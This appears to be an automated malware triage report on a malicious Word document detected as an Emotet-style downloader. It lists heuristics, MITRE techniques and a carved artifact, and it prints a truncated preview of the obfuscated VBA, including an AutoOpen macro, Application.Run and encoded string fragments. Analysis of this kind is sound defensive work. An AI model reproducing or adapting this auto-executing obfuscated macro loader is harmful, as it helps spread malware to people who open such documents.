Verdict: MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and configured to execute a payload using CreateObject. The ClamAV detection and heuristic firings strongly indicate malicious intent, likely to download and execute a second-stage payload. The presence of the AutoOpen macro and the use of CreateObject are common indicators of macro-based malware.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39974 bytes |

SHA-256: 2d4abacbcfc0d148b6cc1861152f39097354308447e2bcf12cb2fcf270ae0543

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 24 long base64-like blob(s))
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "NCzHQsXJMZZmM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
EfPzaz = CByte(uolYwX)
UOVZIT = fMHnwq
iLtwZ = Cos(11855 - Oct(85566 + AswMZf * BnOVbp - CBool(bKnTD)))
Application.Run THLdH + "FfpDWOmzHSOojF" + LcrcYQ, sNdcwu + NLGqwLnjQrj + uKTZb
LTjjJ = CByte(DSIth)
EoTIJ = qEdwB
hqYpfI = Cos(76454 - Oct(74427 + sZssI * RNfkU - CBool(JrGtlA)))
End Sub
Attribute VB_Name = "jWlPSkBS"
Sub NnzFuQ(ObPBs)
qwMjC = CByte(wSwtH)
DfHKaH = AkArk
BsfrS = Cos(42532 - Oct(98538 + KjnCl * cTOQus - CBool(qlEEBH)))
End Sub
Function NLGqwLnjQrj()
On Error Resume Next
dZmqAC = CByte(wcGiL)
DtLTa = BKDzC
mwcVSr = Cos(74801 - Oct(52637 + zFujrI * lGszc - CBool(zumKS)))
MmPuwfEWw = TtJpwT("fL4mADEAOQAyADMANwKjq", 4 + UjiaMQ - UjiaMQ, 15 + UjiaMQ - UjiaMQ)
Mhabk = CByte(OFjaKO)
jVEnRn = EcYzFF
RzhiH = Cos(47668 - Oct(72608 + FZdJi * CsLvdF - CBool(ztGVXk)))
AisdzR = CByte(uiBUN)
tAwWpY = jhPjul
EpKAT = Cos(8925 - Oct(64571 + zHtfC * WMSNoi - CBool(ZITFj)))
TWDsID = TtJpwT("muQA3ADcAOQA3AD4j6c", 3 + kIdWfj - kIdWfj, 13 + kIdWfj - kIdWfj)
OTTMi = CByte(BFEUA)
IQlCp = JWtNUw
GGFij = Cos(82180 - Oct(91336 + ASoduK * AmRrR - CBool(fNZXS)))
cEJpc = CByte(fmNTPN)
wntjlH = FkVjim
YIBHZ = Cos(52893 - Oct(98958 + MJUAHQ * SnCfFl - CBool(BTdKNz)))
wCTKdWj = TtJpwT("8BtSjEAOABhADQAYwA1ADUAYwA5AGYAMQA3AGEANAA3ADMAZgA2ADEAZABiAGEANQA2ADMAOABkADMAOABjADcAMwAwAGYAYwA4ADkAZgA0ADEAYQA2ADUANAAxADgANwA1AGz5", 6 + vNKAwW - vNKAwW, 128 + vNKAwW - vNKAwW)
jdLpcH = CByte(LMpmjL)
jPlAha = hdwhj
GiiPNC = Cos(84950 - Oct(56520 + JKiJAH * NtZZES - CBool(sKjWb)))
ZfUQYj = CByte(iwpACV)
iuTizD = spsFjw
iFXofs = Cos(21177 - Oct(38541 + DSODmX * XhGFB - CBool(JFOAv)))
IDjdLvmudR = TtJpwT("5D8UigANwBmADQAYgAxADMAOAA4AGYAYQA1ADEAMAA3AGYANAAwAGIANwBkADkAZAA0ADYAYQA4ADcAMwA3ADUANQA4ADgAZAAzADMANgAyADEAYwA2AGEAMwAzADMAMQAwADAAYgA4ADMAMABlAGUAMgA1ADMil", 6 + zMItO - zMItO, 153 + zMItO - zMItO)
pcLskO = CByte(tSMWc)
KSPLjA = VXUYZt
IvRafz = Cos(59386 - Oct(59282 + rZioi * zLKdYq - CBool(tufzw)))
WfPVrU = CByte(SuiiQ)
wlUjIT = qKCcHm
KWPja = Cos(45318 - Oct(549 + POUTK * BfozCb - CBool(YEzliL)))
lvhQl = TtJpwT("qAGMAZQBiAGIAMAA5ADcAOQAzADgAZQAzAGEANgA2ADEAZABjAGUANQBhADQAOQBjAGEAYgAzADAAOQAxADAAMwA5AGUAZAAwAGIAMQAzADUAZQBiAGYAZgA2AGMAZQAwADYAZQBjAGYAZAA5AGYAYwAzADgAMQAzADUANQGHfk2GUz", 2 + RHnTr - RHnTr, 166 + RHnTr - RHnTr)
LdnNFQ = CByte(wfwIsZ)
VFPpIF = fOiFKZ
RQvvMH = Cos(12871 - Oct(73747 + GNtsFz * oJBwCw - CBool(vVFDjP)))
RzFfU = CByte(lZfCl)
kVPAjo = UaGLQ
rUIEH = Cos(4975 - Oct(89598 + PBNdY * MdZhH - CBool(adCuu)))
PEYXXpOD = TtJpwT("v1QAyAGUANwBjADZqj3", 3 + IurDi - IurDi, 13 + IurDi - IurDi)
aOFaL = CByte(oSdscU)
zqVUT = WKXqq
ZEqlO = Cos(35655 - Oct(27054 + GcfGo * bpFoTB - CBool(IHiFI)))
CaLko = CByte(iCwfFG)
liIBV = DtVnn
ULhmz = Cos(6417 - Oct(22426 + XavZF * jMqcX - CBool(wEfqXp)))
VzpzSwOT = TtJpwT("YABiADUAYgAxADYAZQBkADAAMgBkADIAMQA1AGYAZQBjADIANQBhADIAKiTLwIIU", 2 + sXqCYO - sXqCYO, 55 + sXqCYO - sXqCYO)
sZIhm = CByte(PURwP)
btiuKn = vHkrCs
vXPfr = Cos(30477 - Oct(18028 + TwPsIA * tOPbfv - CBool(OJVCnu)))
HQYZzZ = CByte(jckqQ)
wsFSOJ = Hofrj
rmiFr = Cos(13157 - Oct(9238 + VAwzz * GpmIVp - CBool(vauDvQ)))
aJksqtTzQpZ = TtJpwT("ZWAAOQA4ADcAOAA2AGQAZgAyAGYAYgAzADUAYQA0ADMAMABiAGYANwAzADcAZAA2AGUAZQBhADYAYwA1ADIANwBkAGMAMgBkADAANABiAGMAZQBjAGQAMwBmADIAZgA5ADQANQA0AGUAOABkAGUAYQAwAGEAYwA3ADkAZB1S58L", 3 + HhFpW - HhFpW, 163 + HhFpW - HhFpW)
VSlhp = CByte(iYBXsj)
XdrGS = UHRCW
ukvMk = Cos(2862 - Oct(92745 + owCPRK * GhoPQ - CBool(iJSinl)))
wndNv = CByte(JqdjA)
mBonu = HCiOk
miUiX = Cos(70341 - Oct(43421 + WLWRDk * KilFIY - CBool(SEFwwt)))
jwtMS = TtJpwT("IGYAYwAxADgANAAzAGIAZQBhADcANQA0ADAAYwA1ADgANQAzAGIAZAA1ADgAYgBmADQAYwA1AGEAYgA5ADUAZQBjADAAYQAyAGMAYwBjADIAZQAzAGMAZQA2AGYANwAyADEAZABjADQAOAA2ADuL40w0F", 2 + vJEQPL - vJEQPL, 145 + vJ
```

... (truncated)